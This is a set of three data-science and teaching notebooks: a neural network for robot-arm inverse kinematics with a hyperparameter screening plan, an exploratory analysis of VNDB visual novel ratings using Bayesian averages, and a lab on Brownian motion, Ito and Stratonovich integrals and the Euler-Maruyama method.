layers.Dense(layer2size, activation='tanh'),
layers.Dense(layer3size, activation='tanh'),
layers.Dense(2) ## output
])
model.compile(loss='mean_squared_error',
optimizer=myoptimizer(learning_rate=learning_rate))
return model
# + colab={"base_uri": "https://localhost:8080/"} id="4eCN_8bjuzwX" outputId="9b007b59-3186-4094-9405-1194e80c38c8"
mymodel = build_and_compile_model()
mymodel.summary()
print()
print('________________________')
print('NN structure in ASCII art')
print('________________________')
print()
keras2ascii(mymodel)
# + [markdown] id="eEdRTD2RnArc"
# ## Train the model
#
# Use 20% of the training data as the validation set
# + colab={"base_uri": "https://localhost:8080/"} id="iKwfxq5HyCrt" outputId="08d6f04d-003f-4ef0-f5cf-b4408194f183"
history = mymodel.fit(din, dout,
batch_size=batch_size, epochs=epochs,
validation_split = 0.2)
# + colab={"base_uri": "https://localhost:8080/", "height": 279} id="-C1SzkvdA-tQ" outputId="79596018-afdb-4fdb-9552-f27400fc4580"
def plot_loss(history):
plt.plot(history.history['loss'], label='loss')
plt.plot(history.history['val_loss'], label='val_loss')
plt.xlabel('Epoch')
plt.ylabel('Error')
plt.legend()
plt.grid(True)
plot_loss(history)
# + [markdown] id="4-sNaAdYt9en"
# ## Test the trained model
# + colab={"base_uri": "https://localhost:8080/"} id="DOrEnj_b0UhR" outputId="dbff73a1-646a-4b07-da98-f2df2b5583a4"
testdatasize = 100
(testdata_in, testdata_out) = gen_data(testdatasize)
predictions = mymodel.predict(testdata_in)
for i in range(10):
print(predictions[i], testdata_out[i])
testdataloss = mymodel.evaluate(testdata_in, testdata_out, batch_size = testdatasize, verbose=1)
print('testdataloss:', testdataloss)
# + [markdown] id="Di_LHbu5yxPL"
# ## Test different trajectories
# + id="VYwdmG6VCRhV" colab={"base_uri": "https://localhost:8080/", "height": 761} outputId="d3347f62-47b6-40b5-ee80-28934336b908"
# Straight line
xtest1 = np.linspace(1.5, 1.7)
ytest1 = 1/0.2*(xtest1 - 1.5) - 0.5
# Parabola
xtest2 = np.linspace(1, 1.8)
ytest2 = -0.5*xtest2*xtest2 + 2
# Circular arc
xtest3 = np.linspace(-0.1, 0.1)
ytest3 = np.sqrt(0.1*0.1 - xtest3*xtest3)
xtest3 = xtest3 + 1.6
ytest3 = ytest3 - 0.4
def plot_trajectory(x, y):
    l1 = l2 = 1  # arm lengths, matching gen_data
    plt.figure()
    plt.plot(x, y, label='target')
    phipred = mymodel.predict(np.vstack((x, y)).T)
    # Compute x and y via forward kinematics
    xpred = l1 * np.cos(phipred[:,0]) + l2 * np.cos(phipred.sum(axis=1))
    ypred = l1 * np.sin(phipred[:,0]) + l2 * np.sin(phipred.sum(axis=1))
    plt.plot(xpred, ypred, label='predicted')
    plt.grid(True)
    plt.legend()
plot_trajectory(xtest1, ytest1)
plot_trajectory(xtest2, ytest2)
plot_trajectory(xtest3, ytest3)
# + [markdown] id="wyrgpS9_7T_r"
# # DoE Definitive Screening
#
# + id="_orbUHSe7Yb8"
# NN Structure Parameter
layer1sizes = [50,100,150]
layer2sizes = [50,100,150]
layer3sizes = [50,100,150]
# Training Parameter
tdatasizes = [10000, 100000, 190000]
myoptimizer = optimizers.Adam
learning_rates = [1E-3, 1E-2, 1E-1]
batch_sizes = [10, 100, 190]
epochss = [5, 10, 15]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="s1sckV1e8E_t" outputId="d0f422c8-e7e0-4a38-f9f9-5beaf6a2fd63"
doe_plan = [[2,0,1,0,2,2,2],
[1,1,1,1,1,1,1],
[0,1,0,2,0,2,2],
[0,0,0,1,2,0,2],
[0,2,1,2,0,0,0],
[0,0,2,2,2,1,0],
[0,0,2,0,0,2,1],
[0,2,2,0,1,0,2],
[1,2,2,2,2,2,2],
[2,2,0,0,0,1,2],
[2,1,2,0,2,0,0],
[2,0,2,2,0,0,2],
[2,0,0,2,1,2,0],
[0,2,0,0,2,2,0],
[2,2,0,2,2,0,1],
[2,2,2,1,0,2,0],
[1,0,0,0,0,0,0]]
testdatasize = 100
(testdata_in, testdata_out) = gen_data(testdatasize)
for i in range(len(doe_plan)):
p = doe_plan[i]
tdatasize = tdatasizes[p[0]]
batch_size = batch_sizes[p[1]]
epochs = epochss[p[2]]
layer1size = layer1sizes[p[3]]
layer2size = layer2sizes[p[4]]
layer3size = layer3sizes[p[5]]
learning_rate = learning_rates[p[6]]
(din, dout) = gen_data(tdatasize)
nnmodel = build_and_compile_model()
tic = time.time()
history = nnmodel.fit(din, dout, batch_size=batch_size, epochs=epochs, validation_split = 0.2)
toc = time.time()
time_taken = toc - tic
testdataloss = nnmodel.evaluate(testdata_in, testdata_out, batch_size = testdatasize, verbose=1)
results = np.array([tdatasize, batch_size, epochs,
layer1size, layer2size,layer3size,
learning_rate,
testdataloss, time_taken])
if i == 0:
saved_data = results
else:
saved_data = np.vstack((saved_data, results))
print('saved_data:', saved_data)
# Save results to file
df = pd.DataFrame(saved_data,
columns=['TDataSize', 'BatchSize', 'Epochs', 'Layer1Size',
'Layer2Size', 'Layer3Size', 'LearningRate',
'Loss','Time'])
df.to_csv('doe.csv')
files.download('doe.csv')
|
simpleRobot.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/PragunSaini/vnrec_notebooks/blob/master/vndb_eda.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text" id="-roAiCeYzv8L"
# ## Database Setup (for cloud notebook)
#
# + colab_type="code" id="UWvqf88czv8Y" colab={}
# For postgresql setup on colab
# Install postgresql server
# !sudo apt-get -y -qq update
# !sudo apt-get -y -qq install postgresql
# !sudo service postgresql start
# # Setup a new user `vndb`
# !sudo -u postgres createuser --superuser vndb
# !sudo -u postgres createdb vndb
# !sudo -u postgres psql -c "ALTER USER vndb PASSWORD '<PASSWORD>'"
# + colab_type="code" id="KKwuwGZVzv8y" colab={"base_uri": "https://localhost:8080/", "height": 86} outputId="c94adb5b-ff54-4a10-c227-2de9306deaa6"
# Download vndb database dump
# !curl -L https://dl.vndb.org/dump/vndb-db-latest.tar.zst -O
# + colab_type="code" id="YmOCXpkQzv9C" colab={}
# Extract and Load data in postgresql
# !sudo apt-get install zstd
# !tar -I zstd -xvf vndb-db-latest.tar.zst
# !PGPASSWORD=<PASSWORD> psql -U vndb -h 127.0.0.1 vndb -f import.sql
# + [markdown] id="M4a-Dze891qG" colab_type="text"
# ## Setup
# + id="3GSym9jlQtVU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="4602f501-d441-4fa4-8eb8-1b2951dfb39d"
# SQL
import sqlalchemy
# Data Handling
import pandas as pd
import numpy as np
import dask.dataframe as dd
from scipy.sparse import csr_matrix, save_npz, load_npz
# Plotting
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('whitegrid')
from wordcloud import WordCloud
# + id="LaEAo0uIQtVs" colab_type="code" colab={}
# PostgreSQL engine
engine = sqlalchemy.create_engine('postgresql://vndb:vndb@localhost:5432/vndb')
# + [markdown] id="kYR39Sn2QtWB" colab_type="text"
# # Exploratory Data Analysis
# + [markdown] id="_rAFNP7kyIfj" colab_type="text"
# ## Tags Metadata
# + jupyter={"outputs_hidden": true} id="VTrpzR0dQtWE" colab_type="code" colab={}
# Read all tags given to vns with vote > 0
tags_vn = pd.read_sql('Select tags.name, tags.cat from tags INNER JOIN tags_vn ON tags.id = tags_vn.tag WHERE tags_vn.vote > 0', con=engine)
# + id="rzjx5CbpQtWW" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="6cb3618a-6248-485b-de25-90da631b25b2"
len(tags_vn.name.unique())
# + id="lGebwl4RQtWk" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="101d6941-840e-43b3-bc39-f8d02f382440"
tags_vn.head()
# + id="Pbb1-JKWQtWz" colab_type="code" colab={}
# -_-
# + id="NjAfapUqQtXB" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 363} outputId="55c30201-82df-4009-a270-866ec224d3f6"
# Excluding ero for some dignity
tags_vn[tags_vn['cat'] != 'ero'].sample(10)
# + id="LEhytPIPQtXP" colab_type="code" colab={}
# Converting to lowercased strings
tags_vn.name = tags_vn.name.str.lower()
# + id="mWiY3fCbQtXX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 139} outputId="262f6227-4b67-4ba9-e97b-39fe965e2bb6"
# Creating a frequency based word cloud
tag_grpd = tags_vn.groupby("name").size()
tag_grpd.sort_values(inplace=True, ascending=False)
tag_grpd.head()
# + id="VNNSK55oQtXj" colab_type="code" colab={}
def random_color_func(word=None, font_size=None, position=None, orientation=None, font_path=None, random_state=None):
return f"hsl({np.random.randint(0, 51)}, {np.random.randint(60, 101)}%, {np.random.randint(30, 70)}%)"
def make_word_cloud(word_freqs):
wc = WordCloud(width=2000, height=1500, background_color="white", color_func=random_color_func).generate_from_frequencies(word_freqs)
# wc = WordCloud(width=2000, height=1500, background_color="white", colormap="hot").generate_from_frequencies(word_freqs)
fig, ax = plt.subplots(figsize=(20, 15))
ax.imshow(wc, interpolation='bilinear')
ax.axis('off')
plt.show()
# + jupyter={"outputs_hidden": true} id="LOpZsxjKQtXx" colab_type="code" colab={}
# NSFW warning
make_word_cloud(tag_grpd)
# + id="HgjAnvSEQtX_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="7e7e01b6-fa45-49d0-b3c9-7f30fa2b7613"
# Let's look at tag categories
tags_cat = tags_vn.cat.unique()
tags_cat
# + id="Tb_FJjnqQtYK" colab_type="code" colab={}
tags_vn.cat = tags_vn.cat.map({'cont': 'content', 'tech': 'technical', 'ero': 'sexual content'})
# + id="G7ecQumpQtYV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="b708a62f-e701-4313-df34-4b7c7e35f8b9"
g = sns.countplot(tags_vn.cat)
g.set_title('Usage of tag categories')
plt.show()
# + [markdown] id="A6OtpazcQtYh" colab_type="text"
# ## Ratings data
# + id="TPQX43Y9QtYj" colab_type="code" colab={}
# Get the ratings data from user lists where vn is marked as finished
finished = pd.read_sql('Select uv.uid, uv.vid, uv.vote, uv.lastmod FROM ulist_vns uv INNER JOIN ulist_vns_labels uvl ON uv.uid = uvl.uid AND uv.vid = uvl.vid AND uvl.lbl = 2', con=engine)
# + id="8AXOClNSQtYy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 206} outputId="0205ba34-e7e2-43d2-e137-e0a9bcbbefa6"
finished.sample(5)
# + id="oFyc3B8kQtY5" colab_type="code" colab={}
# Drop unrated entries
finished = finished.dropna()
# + id="848vuWSNQtZF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 173} outputId="53396ba8-f115-4873-fa22-4e0671435ae8"
finished["vote"].describe()
# + [markdown] id="JGPwWqD7zafl" colab_type="text"
# The votes vary from 10 to 100 with a high mean and median around 70, typical of rating data.
# + id="IGCXB9HwQtZS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="c22643d6-a06d-4947-9aa5-502fd910f84f"
sns.distplot(np.round(finished["vote"]/10), bins=10)
plt.show()
# + id="OmSvLOO_QtZX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 191} outputId="08290a21-e8f0-444d-f5f0-497962471955"
def rating_stats(df):
print(f"Rating Count: {len(df)}")
print(f"User Count: {len(df.uid.unique())}")
print(f"VN Count: {len(df.vid.unique())}")
print(f"Matrix density: {len(df)/(len(df.uid.unique()) * len(df.vid.unique()))}")
user_grp = df.groupby("uid")
user_vote_cnt = user_grp.count()["vote"]
print(f"Max # of voted VN by a user: {user_vote_cnt.max()}")
print(f"Min # of voted VN by a user: {user_vote_cnt.min()}")
print(f"Average # of voted VN by a user: {user_vote_cnt.mean()}")
vn_grp = df.groupby("vid")
vn_vote_cnt = vn_grp.count()["vote"]
print(f"Max # of users voted a VN: {vn_vote_cnt.max()}")
print(f"Min # of users voted a VN: {vn_vote_cnt.min()}")
print(f"Average # of users voted a VN: {vn_vote_cnt.mean()}")
rating_stats(finished)
# + id="GlWKVyJmQtZn" colab_type="code" colab={}
# Converting votes to a scale of 1 - 10
# finished["scaled_vote"] = np.round(finished["vote"] / 10)
# + id="auHM2sbjQtZy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="f0f7a251-ee18-4b69-9a3e-70f67710282f"
# USER RATING DISTRIBUTION
user_votes = finished.groupby("uid").mean()["vote"]
fig, ax = plt.subplots(figsize=(10, 8))
sns.distplot(user_votes, bins=10, kde=False)
ax.set_title("User Rating Distribution")
ax.set_xlabel("Rating")
ax.set_ylabel("Count")
plt.show()
# + id="ikHkQ2EoQtZ-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="ea3988e1-04ce-4abb-e05f-3949d3337ace"
fig, ax = plt.subplots(figsize=(10, 8))
sns.kdeplot(user_votes, shade=True)
ax.set_title("User Rating Distribution")
ax.set_xlabel("Rating")
ax.set_ylabel("Count")
plt.show()
# + id="sBYYkAfyQtaJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="6b7e00b2-2a86-4dc7-8a1a-821f6eec7d18"
# VN RATING DISTRIBUTION
vn_votes = finished.groupby("vid").mean()["vote"]
fig, ax = plt.subplots(figsize=(10, 8))
sns.distplot(vn_votes, kde=False)
ax.set_title("VN Rating Distribution")
ax.set_xlabel("Rating")
ax.set_ylabel("Count")
plt.show()
# + id="n_FyRDBCAtNu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="30422bea-66f1-4436-ac0f-cf778f8e4906"
# Let's try to plot the number of votes per VN
vote_cnt = finished.groupby('vid').count()['vote']
fig, ax = plt.subplots(figsize=(10, 8))
ax.set(yscale="log")
sns.distplot(vote_cnt, kde=False)
ax.set_title("VN Vote Count Distribution")
ax.set_xlabel("Vote Counts Per VN")
plt.show()
# + id="msvxdZk8QtaR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 238} outputId="a61a9ff1-e614-47fc-d985-4f0501ca74ac"
# Finding the Highest Rated VNs based on mean ratings
best_vns = finished.groupby("vid").agg(["count", "mean"])["vote"]
best_vns = best_vns.sort_values(by="mean", ascending=False)
best_vns.head()
# + id="UhDBu34LQtaa" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 534} outputId="c174042d-1c02-488e-9f7f-9731703d3b5e"
fig, ax = plt.subplots(figsize=(10, 8))
best_vns.plot(x="count", y="mean", kind="hexbin", xscale="log", cmap="YlGnBu", gridsize=12, ax=ax)
ax.set_title("Simple Rating Mean Vs Rating Count for VNs")
ax.set_xlabel("Count")
ax.set_ylabel("Mean")
plt.show()
# + id="plbHR_J0Qtan" colab_type="code" colab={}
# Simple means results in heavy tails (high ratings with very few voters)
# + id="Ira1jiVxQtar" colab_type="code" colab={}
# Instead use Bayesian Rating
avg_rating = finished.groupby("vid").agg(["count", "mean"])["vote"]
avg_vote = finished["vote"].mean()
avg_count = avg_rating["count"].mean()
w = avg_rating["count"] / (avg_rating["count"] + avg_count)
avg_rating["bayes_rating"] = (w * avg_rating["mean"]) + (1-w)*avg_vote
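To see the shrinkage effect in isolation, here is a tiny toy example (made-up votes, not VNDB data) of the same weighted mean: a title with a single vote is pulled toward the global mean.

```python
import pandas as pd

# Toy ratings: vid 1 has four votes around 90, vid 2 has a single perfect 100.
ratings = pd.DataFrame({"vid": [1, 1, 1, 1, 2],
                        "vote": [90, 88, 92, 90, 100]})
stats = ratings.groupby("vid")["vote"].agg(["count", "mean"])
avg_vote = ratings["vote"].mean()        # global mean vote: 92.0
avg_count = stats["count"].mean()        # average vote count: 2.5
w = stats["count"] / (stats["count"] + avg_count)
stats["bayes_rating"] = w * stats["mean"] + (1 - w) * avg_vote
print(stats)
```

The single 100 is shrunk to roughly 94.3, so a one-vote title no longer outranks well-voted ones.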
# + id="DKj-ZCDlQta1" colab_type="code" colab={}
avg_rating.sort_values(by="bayes_rating", ascending=False, inplace=True)
# + id="FXEnFLQ6Qta8" colab_type="code" colab={}
# Reading vn data to show titles
vn = pd.read_sql("SELECT id, title from vn", con=engine)
vn.set_index("id", inplace=True)
# + id="bl5kemNuQtbD" colab_type="code" colab={}
best_vns = avg_rating.join(vn, how='left')
# + id="PUKfVD8KQtbL" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 394} outputId="9c5910a8-e246-4447-e1d7-19886ba5a9af"
best_vns.head(10)
# + id="eZVQyQ9AQtbR" colab_type="code" colab={}
# Alternative Bayesian rating (custom setting)
C = 500 # variable count
m = 85 # variable mean
best_vns = finished.groupby("vid").agg(["count", "sum", "mean"])["vote"]
best_vns["bayes_rating"] = (C*m + best_vns["sum"])/(C + best_vns["count"])
best_vns.sort_values(by="bayes_rating", ascending=False, inplace=True)
best_vns = best_vns.join(vn, how="left")
# + id="qURl7I96QtbZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 394} outputId="e599420a-2823-4472-b974-a1bd494d0203"
best_vns.head(10)
# + id="zqekUhrsQtbm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="f5b99ef1-1a36-4980-cc18-6d3b5eaeedd9"
fig, ax = plt.subplots(figsize=(10, 8))
best_vns.plot(x="count", y="bayes_rating", kind="hexbin", xscale="log", cmap="YlGnBu", gridsize=12, ax=ax)
ax.set_title("Simple Rating Mean Vs Rating Count for VNs")
ax.set_xlabel("Count")
ax.set_ylabel("Mean")
plt.show()
vndb_eda.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Stochastic Differential Equations: Lab 1
from IPython.core.display import HTML
css_file = 'https://raw.githubusercontent.com/ngcm/training-public/master/ipython_notebook_styles/ngcmstyle.css'
HTML(url=css_file)
# The background for these exercises is the article by <NAME>, [*An Algorithmic Introduction to Numerical Simulation of Stochastic Differential Equations*, SIAM Review 43:525-546 (2001)](http://epubs.siam.org/doi/abs/10.1137/S0036144500378302).
# Higham provides Matlab codes illustrating the basic ideas at <http://personal.strath.ac.uk/d.j.higham/algfiles.html>, which are also given in the paper.
# For random processes in `python` you should look at the `numpy.random` module. To set the initial seed (which you should *not* do in a real simulation, but allows for reproducible testing), see `numpy.random.seed`.
# ## Brownian processes
# A *random walk* or *Brownian process* or *Wiener process* is a way of modelling error introduced by uncertainty into a differential equation. The random variable representing the walk is denoted $W$. A single realization of the walk is written $W(t)$. We will assume that
#
# 1. The walk (value of $W(t)$) is initially (at $t=0$) $0$, so $W(0)=0$, to represent "perfect knowledge" there;
# 2. The walk is *on average* zero, so $\mathbb{E}[W(t+h) - W(t)] = 0$, where the *expectation value* is taken over the probability density $p(w, t)$ of the walk,
# $$
# \mathbb{E}[W(t)] = \int_{-\infty}^{\infty} w \, p(w, t) \, \text{d}w;
# $$
# 3. Any step in the walk is independent of any other step, so $W(t_2) - W(t_1)$ is independent of $W(s_2) - W(s_1)$ for any $s_{1,2} \ne t_{1,2}$.
#
# These requirements lead to a definition of a *discrete* random walk: given the points $\{ t_i \}$ with $i = 0, \dots, N$ separated by a uniform timestep $\delta t$, we have - for a single realization of the walk - the definition
# $$
# \begin{align}
# \text{d}W_i &= \sqrt{\delta t} {\cal N}(0, 1), \\
# W_i &= \left( \sum_{j=0}^{i-1} \text{d}W_j \right), \\
# W_0 &= 0
# \end{align}
# $$
# Here ${\cal N}(0, 1)$ means a realization of a normally distributed random variable with mean $0$ and standard deviation $1$: programmatically, the output of `numpy.random.randn`.
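This definition can be sketched directly (a minimal example, assuming only `numpy`; the seed is fixed for reproducible testing only):

```python
import numpy

# One realization of a discrete Brownian path on [0, 1].
numpy.random.seed(100)          # for reproducible testing only
N = 500
dt = 1.0 / N
dW = numpy.sqrt(dt) * numpy.random.randn(N)        # increments dW_i = sqrt(dt) N(0, 1)
W = numpy.concatenate(([0.0], numpy.cumsum(dW)))   # W_0 = 0, W_i = sum of increments
```

The cumulative sum implements $W_i = \sum_{j=0}^{i-1} \text{d}W_j$ in a single vectorised call.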
# When working with discrete Brownian processes, there are two things we can do.
#
# 1. We can think about a *single realization* at different timescales, by averaging over more points. E.g.
# $$
# W_i = \sum_{j=0}^{i-1} \sum_{k=0}^{p-1} \text{d}W_{(p j + k)}
# $$
# is a Brownian process with timestep $p \, \delta t$.
# 2. We can think about *multiple realizations* by computing a new set of steps $\text{d}W$, whilst keeping the timestep fixed.
#
# Both viewpoints are important.
# ### Tasks
# 1. Simulate a single realization of a Brownian process over $[0, 1]$ using a step length $\delta t = 1/N$ for $N = 500, 1000, 2000$. Use a fixed seed of `100`. Compare the results.
# 2. Simulate different realizations of a Brownian process with $\delta t$ of your choice. Again, compare the results.
# %matplotlib inline
import numpy
from matplotlib import pyplot
from matplotlib import rcParams
rcParams['font.family'] = 'serif'
rcParams['font.size'] = 16
rcParams['figure.figsize'] = (12,6)
from scipy.integrate import quad
# Evaluate the function $u(W(t)) = \sin^2(t + W(t))$, where $W(t)$ is a Brownian process, on $M$ Brownian paths for $M = 500, 1000, 2000$. Compare the *average* path for each $M$.
# The average path at time $t$ should be given by
# $$
# \begin{equation}
# \int_{-\infty}^{\infty} \frac{\sin(t+s)^2 \exp(-s^2 / 2t)}{\sqrt{2 \pi t}} \,\text{d}s.
# \end{equation}
# $$
# +
# This computes the exact solution!
t_int = numpy.linspace(0.005, numpy.pi, 1000)
def integrand(x,t):
return numpy.sin(t+x)**2*numpy.exp(-x**2/(2.0*t))/numpy.sqrt(2.0*numpy.pi*t)
int_exact = numpy.zeros_like(t_int)
for i, t in enumerate(t_int):
int_exact[i], err = quad(integrand, -numpy.inf, numpy.inf, args=(t,))
# -
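The Monte Carlo side of this task can be sketched by vectorising over paths (`M` and `N` here are arbitrary choices); `u_mean` can then be plotted against `int_exact` above to check convergence as `M` grows:

```python
import numpy

# Average u(W(t)) = sin^2(t + W(t)) over M Brownian paths.
numpy.random.seed(100)
M, N = 500, 1000                # number of paths, number of time steps (arbitrary)
T = numpy.pi
dt = T / N
t = numpy.linspace(dt, T, N)
dW = numpy.sqrt(dt) * numpy.random.randn(M, N)
W = numpy.cumsum(dW, axis=1)    # one Brownian path per row
u_mean = numpy.mean(numpy.sin(t + W) ** 2, axis=0)
```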
# ## Stochastic integrals
# We have, in eg finite elements or multistep methods for IVPs, written the solution of differential equations in terms of integrals. We're going to do the same again, so we need to integrate random variables. The integral of a random variable *with respect to a Brownian process* is written
# $$
# \int_0^t G(s) \, \text{d}W_s,
# $$
# where the notation $\text{d}W_s$ indicates that the step in the Brownian process depends on the (dummy) independent variable $s$.
#
# We'll concentrate on the case $G(s) = W(s)$, so we're trying to integrate the Brownian process itself. If this were a standard, non-random variable, the answer would be
# $$
# \int_0^t W(s) \, \text{d}W_s = \frac{1}{2} \left( W(t)^2 - W(0)^2 \right).
# $$
#
# When we approximate the quadrature numerically, we split the interval $[0, T]$ into strips (subintervals), approximate the integral on each subinterval by picking a point inside it, evaluating the integrand at that point, and weighting it by the width of the subinterval. In normal integration it doesn't matter which point within the subinterval we choose.
#
# In the stochastic case that is not true. We pick a specific point $\tau_i = a t_i + (1-a) t_{i-1}$ in the interval $[t_{i-1}, t_i]$. The value $a \in [0, 1]$ is a constant that says where within each interval we are evaluating the integrand. We can then approximate the integral by
#
# \begin{equation}
# \int_0^T W(s) \, dW_s \approx \sum_{i=1}^N W(\tau_i) \left[ W(t_i) - W(t_{i-1}) \right] = S_N.
# \end{equation}
#
# Now we can compute (using that the expectation of the products of $W$ terms is the covariance, which is the minimum of the arguments)
#
# \begin{align}
# \mathbb{E}(S_N) &= \mathbb{E} \left( \sum_{i=1}^N W(\tau_i) \left[ W(t_i) - W(t_{i-1}) \right] \right) \\
# &= \sum_{i=1}^N \mathbb{E} \left( W(\tau_i) W(t_i) \right) - \mathbb{E} \left( W(\tau_i) W(t_{i-1}) \right) \\
# &= \sum_{i=1}^N (\min\{\tau_i, t_i\} - \min\{\tau_i, t_{i-1}\}) \\
# &= \sum_{i=1}^N (\tau_i - t_{i-1}) \\
# &= \sum_{i=1}^N a \, (t_i - t_{i-1}) \\
# &= (T - t_0) \, a.
# \end{align}
#
# The choice of evaluation point **matters**.
# So there are multiple different stochastic integrals, each (effectively) corresponding to a different choice of $a$. There are two standard choices:
#
# 1. Ito: choose $a=0$.
# 2. Stratonovich: choose $a=1/2$.
#
# These lead to
# $$
# \int_0^t G(s) \, \text{d}W_s \simeq_{\text{Ito}} \sum_{j=0}^{N-1} G(s_j, W(s_j)) \left( W(s_{j+1}) - W(s_j) \right) = \sum_{j=0}^{N-1} G(s_j) \text{d}W(s_{j})
# $$
# for the Ito integral, and
# $$
# \int_0^t G(s) \, \text{d}W_s \simeq_{\text{Stratonovich}} \sum_{j=0}^{N-1} \frac{1}{2} \left( G(s_j, W(s_j)) + G(s_{j+1}, W(s_{j+1})) \right) \left( W(s_{j+1}) - W(s_j) \right) = \sum_{j=0}^{N-1} \frac{1}{2} \left( G(s_j, W(s_j)) + G(s_{j+1}, W(s_{j+1})) \right) \text{d}W(s_{j}).
# $$
# for the Stratonovich integral.
# ### Tasks
# Write functions to compute the Itô and Stratonovich integrals of a function $h(t, W(t))$ of a *given* Brownian process $W(t)$ over the interval $[0, 1]$.
def ito(h, trange, dW):
    """Compute the Ito stochastic integral of h given the range of t.
    Parameters
    ----------
    h : function
        integrand, evaluated as h(t, W)
    trange : list of float
        the range of integration
    dW : array of float
        Brownian increments
    Returns
    -------
    ito : float
        the integral
    """
    # Reconstruct the times and the path, then evaluate the integrand at the
    # left endpoint of each subinterval (the Ito choice, a = 0).
    t = numpy.linspace(trange[0], trange[-1], len(dW) + 1)
    W = numpy.zeros(len(dW) + 1)
    W[1:] = numpy.cumsum(dW)
    ito = numpy.sum(h(t[:-1], W[:-1]) * dW)
    return ito
def stratonovich(h, trange, dW):
    """Compute the Stratonovich stochastic integral of h given the range of t.
    Parameters
    ----------
    h : function
        integrand, evaluated as h(t, W)
    trange : list of float
        the range of integration
    dW : array of float
        the Brownian increments
    Returns
    -------
    stratonovich : float
        the integral
    """
    # Average the integrand over both subinterval endpoints
    # (the Stratonovich choice, a = 1/2).
    t = numpy.linspace(trange[0], trange[-1], len(dW) + 1)
    W = numpy.zeros(len(dW) + 1)
    W[1:] = numpy.cumsum(dW)
    stratonovich = numpy.sum(0.5 * (h(t[:-1], W[:-1]) + h(t[1:], W[1:])) * dW)
    return stratonovich
# Test the functions on $h = W(t)$ for various $N$. Compare the limiting values of the integrals.
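As a self-contained numerical check (computing the two sums directly for $h = W(t)$ rather than through any helper functions), the Ito and Stratonovich integrals should approach $\tfrac{1}{2}(W(T)^2 - T)$ and $\tfrac{1}{2}W(T)^2$ respectively:

```python
import numpy

numpy.random.seed(100)
N = 100000
T = 1.0
dt = T / N
dW = numpy.sqrt(dt) * numpy.random.randn(N)
W = numpy.concatenate(([0.0], numpy.cumsum(dW)))
ito_sum = numpy.sum(W[:-1] * dW)                       # a = 0
strat_sum = numpy.sum(0.5 * (W[:-1] + W[1:]) * dW)     # a = 1/2
# Limits: ito_sum -> (W(T)^2 - T)/2, strat_sum -> W(T)^2 / 2
```

The Stratonovich sum telescopes exactly to $\tfrac{1}{2}W(T)^2$; the Ito sum differs from it by $\tfrac{1}{2}\sum \text{d}W_j^2 \approx \tfrac{1}{2}T$.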
# ## Euler-Maruyama's method
# Now we can write down a stochastic differential equation.
#
# The differential form of a stochastic differential equation is
# $$
# \frac{\text{d}X}{\text{d}t} = f(X) + g(X) \frac{\text{d}W}{\text{d}t}
# $$
# and the comparable (and more useful) *integral form* is
# $$
# \text{d}X = f(X) \, \text{d}t + g(X) \text{d}W.
# $$
# This has formal solution
# $$
# X(t) = X_0 + \int_0^t f(X(s)) \, \text{d}s + \int_0^t g(X(s)) \, \text{d}W_s.
# $$
# We can use our Ito integral above to write down the *Euler-Maruyama method*
#
# $$
# X(t+h) \simeq X(t) + h f(X(t)) + g(X(t)) \left( W(t+h) - W(t) \right) + {\cal{O}}(h^p).
# $$
#
# Written in discrete, subscript form we have
#
# $$
# X_{n+1} = X_n + h f_n + g_n \, \text{d}W_{n}
# $$
#
# The order of convergence $p$ is an interesting and complex question.
# ### Tasks
# Apply the Euler-Maruyama method to the stochastic differential equation
#
# $$
# \begin{equation}
# dX(t) = \lambda X(t) \, dt + \mu X(t) \, dW(t), \qquad X(0) = X_0.
# \end{equation}
# $$
#
# Choose any reasonable values of the free parameters $\lambda, \mu, X_0$.
#
# The exact solution to this equation is $X(t) = X(0) \exp \left[ \left( \lambda - \tfrac{1}{2} \mu^2 \right) t + \mu W(t) \right]$. Fix the timestep and compare your solution to the exact solution.
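A minimal Euler-Maruyama sketch for this equation (the values $\lambda = 2$, $\mu = 1$, $X_0 = 1$ and the step count are arbitrary choices):

```python
import numpy

numpy.random.seed(100)
lam, mu, X0 = 2.0, 1.0, 1.0            # arbitrary parameter choices
T, N = 1.0, 512
dt = T / N
dW = numpy.sqrt(dt) * numpy.random.randn(N)
W = numpy.cumsum(dW)                   # path at t_1, ..., t_N

# Euler-Maruyama: X_{n+1} = X_n + h f_n + g_n dW_n
X = numpy.zeros(N + 1)
X[0] = X0
for n in range(N):
    X[n + 1] = X[n] + dt * lam * X[n] + mu * X[n] * dW[n]

# Exact solution along the same Brownian path, for comparison
t = numpy.linspace(dt, T, N)
X_exact = X0 * numpy.exp((lam - 0.5 * mu**2) * t + mu * W)
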